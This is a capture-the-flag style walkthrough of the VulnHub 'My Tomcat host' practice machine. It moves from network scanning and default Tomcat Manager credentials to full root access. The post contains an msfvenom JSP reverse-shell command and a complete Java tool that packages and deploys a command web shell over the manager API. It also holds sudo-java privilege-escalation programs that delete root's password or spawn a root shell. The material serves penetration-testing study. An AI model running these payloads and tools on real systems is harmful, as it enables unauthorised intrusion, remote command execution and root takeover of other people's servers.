My Tomcat host walkthrough

MachineX
Armour Infosec
Published in
5 min readApr 12, 2020

Hola, hackers of all sorts! This is a quick walkthrough of a VulnHub machine, My Tomcat host. You can find this box at the following link:

https://www.infosecwarrior.com/my-tomcat-host/

It's a nice box, as it won't leave you without teaching something new. According to the author, the difficulty is easy/beginner level. Okay, enough talking, let's get started…

Methodology applied :

Host discovery

  • netdiscover

Enumeration

  • nmap
  • nikto

Exploit

  • msfvenom

Privilege escalation (the fun part 😝 )

  • java (allowed via sudo)

Let the hacking begin……
→ Host discovery

┌─[root@machine]─[~/mine/tomcat]
└──╼ #netdiscover -i vboxnet0

netdiscover lists the target at 192.168.56.37.
Alternatively it can be done with nmap. The command below sweeps every port on the whole /24, which is slow; a plain ping sweep (nmap -sn) is enough just to find live hosts, and the full port scan can wait until you have a target:

┌─[✗]─[root@machine]─[~/mine/tomcat]
└──╼ #nmap -v -p- 192.168.56.1/24

→ Enumeration

Use nmap to find the open ports.
First, a SYN ("stealth") scan across all 65535 ports:

┌─[✗]─[root@machine]─[~/mine/tomcat]
└──╼ #nmap -sS -v -p- 192.168.56.37

Ports 22 and 8080 are open. Now run an aggressive scan (-A: version detection, default scripts, OS detection and traceroute) against just those two ports.

┌─[✗]─[root@machine]─[~/mine/tomcat]
└──╼ #nmap -A -p 8080,22 -v 192.168.56.37

Port 8080 is serving HTTP, so let's open it in a browser.

It's the default Tomcat landing page. Since it's a web thing, we can't skip the nikto results:

┌─[root@machine]─[~/mine/tomcat]
└──╼ #nikto -h http://192.168.56.37:8080/

Out of everything nikto reports, the key finding is that the Tomcat Manager application at /manager/html accepts the default credentials tomcat:tomcat.

Logging in, we see that the manager's deploy form accepts only .war files.

→ Exploiting

A little googling on building backdoors/reverse shells in .war format turned up a way:

┌─[root@machine]─[~/mine/tomcat]
└──╼ #msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.56.1 LPORT=1234 -f war > shell.war

where LHOST is our IP and LPORT is our listener port.
With the payload ready, we are all set to launch the attack: start a listener on port 1234 on our machine, upload shell.war through the manager, then open the deployed context (/shell) in the browser so the JSP runs and connects back:


It worked perfectly: we have an unprivileged shell on the target, running as the tomcat service account. Let's move on to the next stage, privilege escalation.
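To show what actually goes into that upload, here is an added example (mine, not the post's or Metasploit's code) that builds a minimal WAR by hand and deploys it through the Tomcat Manager's text API instead of the HTML form. A WAR is just a zip; on Tomcat 7+ a bare JSP at its root needs no web.xml. The host, credentials and context path /cmd are assumptions taken from the walkthrough, and the text API (/manager/text/deploy) needs the manager-script role, which the page never confirms the tomcat account has; if it doesn't, use the HTML form as above.

```java
import java.io.BufferedReader;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import java.util.zip.ZipEntry;
import java.util.zip.ZipOutputStream;

// Added example: hand-rolled WAR with a JSP command shell, pushed via the manager text API.
public class WarDeploy {

    // The JSP that ends up inside the WAR: runs ?cmd=... and streams its stdout back.
    // Runtime.exec() does not go through a shell, so "cmd=id" works but "cmd=id | grep x" does not.
    static final String CMD_JSP =
        "<%@ page import=\"java.io.*\" %>\n" +
        "<% String c = request.getParameter(\"cmd\");\n" +
        "   if (c != null) {\n" +
        "     Process p = Runtime.getRuntime().exec(c);\n" +
        "     InputStream in = p.getInputStream(); int b;\n" +
        "     while ((b = in.read()) != -1) out.write(b);\n" +
        "   } %>\n";

    // A WAR is a zip file; one entry is enough for Tomcat to serve the JSP.
    static byte[] buildWar(String jspName, String jspBody) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ZipOutputStream zos = new ZipOutputStream(bos)) {
            zos.putNextEntry(new ZipEntry(jspName));
            zos.write(jspBody.getBytes(StandardCharsets.UTF_8));
            zos.closeEntry();
        }
        return bos.toByteArray();
    }

    // PUT the WAR body to /manager/text/deploy?path=<ctx>. Assumes the account holds
    // the manager-script role; the HTML form the post uses only needs manager-gui.
    static String deploy(String base, String user, String pass, String ctx, byte[] war) throws IOException {
        URL u = new URL(base + "/manager/text/deploy?path=" + ctx + "&update=true");
        HttpURLConnection c = (HttpURLConnection) u.openConnection();
        c.setRequestMethod("PUT");
        c.setDoOutput(true);
        String cred = Base64.getEncoder()
            .encodeToString((user + ":" + pass).getBytes(StandardCharsets.UTF_8));
        c.setRequestProperty("Authorization", "Basic " + cred);
        c.setRequestProperty("Content-Type", "application/octet-stream");
        try (OutputStream os = c.getOutputStream()) {
            os.write(war);
        }
        try (BufferedReader r = new BufferedReader(
                new InputStreamReader(c.getInputStream(), StandardCharsets.UTF_8))) {
            return r.readLine(); // "OK - Deployed application at context path /cmd" on success
        }
    }

    public static void main(String[] args) throws IOException {
        // Target and credentials from the walkthrough; override the base URL on the command line.
        String base = args.length > 0 ? args[0] : "http://192.168.56.37:8080";
        byte[] war = buildWar("cmd.jsp", CMD_JSP);
        System.out.println(deploy(base, "tomcat", "tomcat", "/cmd", war));
        System.out.println("then browse to: " + base + "/cmd/cmd.jsp?cmd=id");
    }
}
```

This gives a web shell (no listener needed) rather than the reverse shell msfvenom produces; the msfvenom WAR is the same idea with a JSP that opens a socket back to LHOST:LPORT. Either way, the whole attack hinges on the default manager credentials, so the fix is the same: remove or change tomcat:tomcat in tomcat-users.xml and don't expose the manager app to untrusted networks.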

→ Privilege escalation

First, let's upgrade this dumb shell into an interactive one. This matters here: the sudo Defaults shown below include requiretty, so sudo will refuse to run anything until we have a pseudo-terminal.

Roaming through the directories turned up nothing interesting, so I checked what sudo allows:

bash-4.2$ sudo -l
Matching Defaults entries for tomcat on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User tomcat may run the following commands on this host:
(ALL) NOPASSWD:
/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java

So we can run that java binary as root, with no password. Since java will execute whatever class we hand it, this is arbitrary code execution as root.

NOTE: This is the most interesting part of the machine. You will find many Java snippets that execute shell commands, but the actual catch is compiling and running them properly: the code has to live inside a class, inside a main method, and the file must be named after the class. Let's see how this is done.

You can find such a program anywhere; I got mine on Stack Overflow 😅…

The program looks like this:

import java.io.BufferedReader;
import java.io.InputStreamReader;

public class exploit {
    public static void main(String args[]) {
        String s;
        Process p;
        try {
            // the command you want to execute (run as root once launched via sudo)
            p = Runtime.getRuntime().exec("passwd -d root");
            // echo the command's stdout line by line
            BufferedReader br = new BufferedReader(
                new InputStreamReader(p.getInputStream()));
            while ((s = br.readLine()) != null)
                System.out.println("line: " + s);
            p.waitFor();
            System.out.println("exit: " + p.exitValue());
            p.destroy();
        } catch (Exception e) {
            // don't swallow failures silently; you want to know if exec() refused
            e.printStackTrace();
        }
    }
}

NOTE: the file name must match the public class name, i.e. class_name.java, so this program is saved as exploit.java.
→ compile it

bash-4.2$ javac exploit.java

This produces exploit.class in the same directory.

→ run it with sudo

bash-4.2$ sudo java exploit 
line: Removing password for user root.
line: passwd: Success
exit: 0
bash-4.2$

Now su to root: it lets us in without asking for a password, because passwd -d root, run through sudo, deleted root's password. Smart, right? 😎.. I know 😉

and BOOOOMMM!! 🔥🔥🔥🔥…we just owned this box!

Remember, that program runs a single command and does not go through a shell, so the simplest and quickest thing I found was to delete root's password. Bear in mind this is a loud, state-changing move: on anything but a practice box you would rather spawn a shell than leave root passwordless.
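As an added example (my own code, not the post's), here is the more general version of the same trick: instead of baking one command into the class, let java hand control to an interactive shell, so sudo java gives a root shell directly and nothing on the box is changed. The class name RootShell and the choice of /bin/bash are assumptions.

```java
import java.io.IOException;
import java.util.Arrays;

// Added example: run an arbitrary argv wired to our terminal. Launched as
// "sudo java RootShell" the JVM is already uid 0, so the child is root too.
public class RootShell {

    // Starts argv as a child that inherits our stdin/stdout/stderr and returns its
    // exit status. ProcessBuilder does not invoke a shell: pass a real argv, or
    // {"/bin/sh", "-c", "a | b"} when you need shell syntax.
    public static int run(String... argv) throws IOException, InterruptedException {
        ProcessBuilder pb = new ProcessBuilder(argv);
        pb.inheritIO();          // this is what makes the shell interactive
        Process p = pb.start();
        return p.waitFor();
    }

    public static void main(String[] args) throws Exception {
        // No arguments: interactive bash as root.
        // Otherwise run the given command, e.g.  sudo java RootShell id
        String[] argv = args.length == 0 ? new String[] {"/bin/bash", "-i"} : args;
        System.err.println("exec: " + Arrays.toString(argv));
        System.exit(run(argv));
    }
}
```

Compile it on the box with javac RootShell.java (a JDK is there, since javac worked above), or on your own machine with javac --release 8 RootShell.java, because the sudo rule points at an OpenJDK 1.8 runtime and a newer class-file version would be rejected with UnsupportedClassVersionError. Then run sudo java RootShell from the directory holding RootShell.class; do it from the upgraded pty, since the requiretty default otherwise blocks sudo, and if the bare name is refused use the full java path from sudo -l.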

So, that was all from my side. There could be other ways to root this box too; I found this one the simplest. I am a learner and always will be 😌. Any amendments to my work are welcome and appreciated.
Thank you!

HAPPY HACKING!! 😉
